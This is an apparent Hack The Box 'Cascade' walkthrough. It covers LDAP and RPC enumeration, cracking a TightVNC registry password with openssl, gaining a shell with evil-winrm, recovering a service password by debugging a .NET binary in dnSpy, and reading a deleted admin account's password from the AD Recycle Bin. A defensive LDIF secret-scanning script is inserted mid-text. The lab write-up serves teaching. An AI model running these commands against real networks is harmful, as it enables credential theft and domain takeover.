HTB | Cascade — Reverse Engineering - DnSpy and AD Recycle
This box is on the Hack The Box Active Directory 101 track. Find the box here.
You can find the video walkthrough here.
Skills Learned
- TightVNC Password Extraction
- Active Directory Enumeration
- Reverse Engineering — DnSpy
- AD Recycle Bin
NMAP
IP: 10.10.10.182
nmap -sT -p- --min-rate 10000 10.10.10.182
nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,49154,49155,49157,49158,49165 10.10.10.182 -Pn
SMB & RPC
smbmap and smbclient do not work without credentials:
smbmap -H 10.10.10.182
Let’s try rpcclient:
rpcclient -U "" -N 10.10.10.182
I will copy the users into a list for later.
Let’s look at the groups too.
LDAP — TCP 389
To enumerate LDAP, first I’ll get the naming context:
ldapsearch -H ldap://10.10.10.182 -x -s base namingcontexts
I will dump all the info in a file:
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-anonymous
Now I will look through the file for valuable information. While going through it I found a password for Ryan (r.thompson).
Since it is base64-encoded, I can decode it:
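The search through the anonymous LDAP dump above is worth automating when auditing a directory export for secrets stored in custom attributes. The following is an added example, not code from the original write-up: it parses ldapsearch (LDIF) output, unfolds continuation lines, and reports attribute values that are base64 of printable text, while skipping base64 that decodes to binary (the same distinction that matters later with the Audit.db values). The sample LDIF, the second entry and its blob are constructed; only the r.thompson password value comes from this page.

```python
import base64

# Constructed ldapsearch (LDIF) sample: the first cascadeLegacyPwd is the base64 of the
# r.thompson password from this page; the second is a made-up blob that is valid base64
# but decodes to binary, like the Audit.db rows that did not decode to ASCII.
SAMPLE_LDIF = """\
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=Example Svc,OU=Services,DC=cascade,DC=local
cascadeLegacyPwd: 3tHq4a+ufSdyM0l0R2lqFw==
"""
SKIP = {"dn", "objectclass", "samaccountname"}  # never secrets; cuts false positives

def parse_ldif(text):
    """Split LDIF into {attr: [values]} dicts, unfolding continuation lines and 'attr::'."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:  # ldapsearch folds long values at 76 columns
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:  # the trailing "" flushes the last entry
        if not line:
            if current:
                entries.append(current)
            current = {}
            continue
        name, _, value = line.partition(":")
        if value.startswith(":"):  # LDIF writes non-safe strings as 'attr:: base64'
            value = base64.b64decode(value[1:]).decode("utf-8", "replace")
        current.setdefault(name, []).append(value.strip())
    return entries

def find_decodable_secrets(entries):
    """Return (dn, attr, plaintext) for attribute values that are base64 of printable ASCII."""
    hits = []
    for entry in entries:
        dn = entry.get("dn", ["?"])[0]
        for attr in (a for a in entry if a.lower() not in SKIP):
            for v in entry[attr]:
                try:
                    plain = base64.b64decode(v, validate=True).decode("ascii")
                except (ValueError, UnicodeDecodeError):
                    continue  # not base64, or base64 of binary (encrypted or opaque)
                if len(v) >= 8 and plain.isprintable():
                    hits.append((dn, attr, plain))
    return hits
```

Run it against a real dump with parse_ldif(open("ldap-anonymous").read()); the length and printable checks are a heuristic, so review hits by hand.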
Foothold/shell
Let’s check the creds against WinRM and SMB.
SMB works but WinRM does not:
smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva
Since we have read-only access on some shares, let’s take a look.
There are many files in each of the shares I have access to. I use the following smbclient commands to pull all the files from each share (Data, for example):
mask ""
recurse ON
prompt OFF
mget *
There are 5 folders.
We found some files in the IT folder:
find IT/ -type f
On opening the Meeting Notes we found:
According to the mail, we have to keep an eye out for the admin account password and the TempAdmin account.
Let’s cat VNC Install.reg:
The line “Password”=hex:6b,cf,2a,4b,6e,5a,ca,0f jumped out as interesting.
Crack TightVNC Password
This GitHub repo shows how to decrypt the VNC password using msfconsole.
The repo also shows another way, using openssl:
echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
Note: on OpenSSL 3.x, single DES lives in the legacy provider, so the enc command needs -provider legacy -provider default added, or it fails with an unsupported cipher error.
Now that we have the password, let’s try it with SMB and WinRM.
WinRM worked:
crackmapexec winrm 10.10.10.182 -u s.smith -p sT333ve2
I’ll use Evil-WinRM to get a shell:
evil-winrm -i 10.10.10.182 -u s.smith -p 'sT333ve2'
And we are in. I found user.txt.
Priv Esc
s.smith is a member of the Audit Share group:
net user s.smith
Since it is not a standard Microsoft group, let’s check it:
net localgroup "Audit Share"
s.smith is the only user in the group, but the comment has a useful hint to look at this share. There’s a c:\shares, but I don’t have permission to list the directories in it:
However, I can cd into Shares\Audit based on the name from the comment.
Since I have access to the Audit share, I check it with smbmap:
smbmap -H 10.10.10.182 -u s.smith -p 'sT333ve2'
I will copy all the files to my local system.
We found an Audit.db file.
Let’s dump the tables using sqlite3:
Nothing jumped out as particularly interesting. I thought the Ldap table could have had a password in it, but the base64-encoded data didn’t decode to ASCII. Perhaps it’s encrypted somehow.
CascAudit.exe & DnSpy
RunAudit.bat shows that CascAudit.exe is run with the DB file as an argument:
It’s a .NET binary.
Download dnSpy and load the exe in it.
It opens an SQLite connection to the database passed as an argument, reads from the LDAP table, and decrypts the password.
I decided to recover the plaintext password by debugging. I put a breakpoint on line 53, where the SQL connection is closed. Then I went Debug -> Start Debugging and set the Argument to where I had a copy of the Audit.db:
Note: copy all the files, including the SQLite DLL files, to Windows before starting the debug session.
On hitting OK, it runs to the breakpoint, and I can see the decrypted password in the Locals window:
Based on the line in the SQLite DB, this password, w3lc0meFr31nd, likely pairs with the account arksvc.
Let’s try this password for WinRM. crackmapexec shows that the password works:
Had I not known the account that was associated with this password, I could have used crackmapexec with a list of users (the list we got from rpcclient):
crackmapexec winrm 10.10.10.182 -u user.txt -p w3lc0meFr31nd --continue-on-success
And we are in.
From whoami /groups we can see that arksvc is a member of AD Recycle Bin.
AD Recycle
AD Recycle Bin is a well-known Windows group. Active Directory Object Recovery (or Recycle Bin) is a feature added in Server 2008 to allow administrators to recover deleted items just like the recycle bin does for files. The linked article gives a PowerShell command to query all of the deleted objects within a domain:
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
Filtering out the Deleted Objects container itself leaves only the recoverable objects:
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
The last one is really interesting, because it’s the temporary administrator account mentioned in the old email I found earlier (which also said it was using the same password as the normal admin account).
I can get all the details for that account:
Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *
Immediately cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz jumps out. It decodes to baCT3r1aN00dles:
Using this password for the administrator account, we are in,
and we have root.txt.
If you enjoyed this article and want to dive deeper into cybersecurity topics, feel free to explore my detailed write-ups on GitBook. I cover a range of topics including vulnerability assessments, penetration testing techniques, and security methodologies.
- Check out my GitBook for more insights
- Watch my videos on YouTube: AnuragSec
Stay tuned for more content, and don’t forget to follow for future updates!
HTB | Cascade — Reverse Engineering - DnSpy and AD Recycle was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.